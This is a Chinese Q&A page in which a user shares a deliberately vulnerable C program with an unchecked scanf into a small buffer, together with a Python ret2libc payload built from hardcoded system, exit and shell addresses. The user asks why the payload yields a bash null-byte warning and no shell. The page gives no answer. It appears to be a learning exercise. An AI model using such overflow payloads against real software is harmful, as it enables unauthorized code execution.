ret2libc漏洞利用练习导致/ bin / bash:警告:命令替换:输入中的空字节被忽略

问题描述

我正在使用以下C代码来创建以下漏洞:

#include <stdio.h>
void secretFunction()
{
  printf("Congratulations!\n");
  printf("You have entered in the secret function!\n");
}
void echo()
{
            char buffer[20];
            printf("Enter some text:\n");
            scanf("%s",buffer);
            printf("You entered: %s\n",buffer);
}    
int main()
{
            echo();
            return 0;
}

我用python编写了漏洞利用程序:

system_addr = struct.pack("<I",0xb7e1d200)
shell_addr  = struct.pack("<I",0xbffffef3)
exit_addr   = struct.pack("<I",0xb7e103d0)
buf  =   "B" * 32
buf  +=  system_addr
buf  +=  exit_addr
buf  +=  shell_addr
print buf

当我在gdb中兴奋时,它给了我:

/bin/bash: warning: command substitution: ignored null byte in input

并且没有重定向到shell那么问题是什么?

解决方法

暂无找到可以解决该程序问题的有效方法,小编努力寻找整理中!

如果你已经找到好的解决方法,欢迎将解决方案带上本链接一起发送给小编。

小编邮箱:dio#foxmail.com (将#修改为@)

相关问答

错误1:Request method ‘DELETE‘ not supported 错误还原:...
错误1:启动docker镜像时报错:Error response from daemon:...
错误1:private field ‘xxx‘ is never assigned 按Alt...
报错如下,通过源不能下载,最后警告pip需升级版本 Requirem...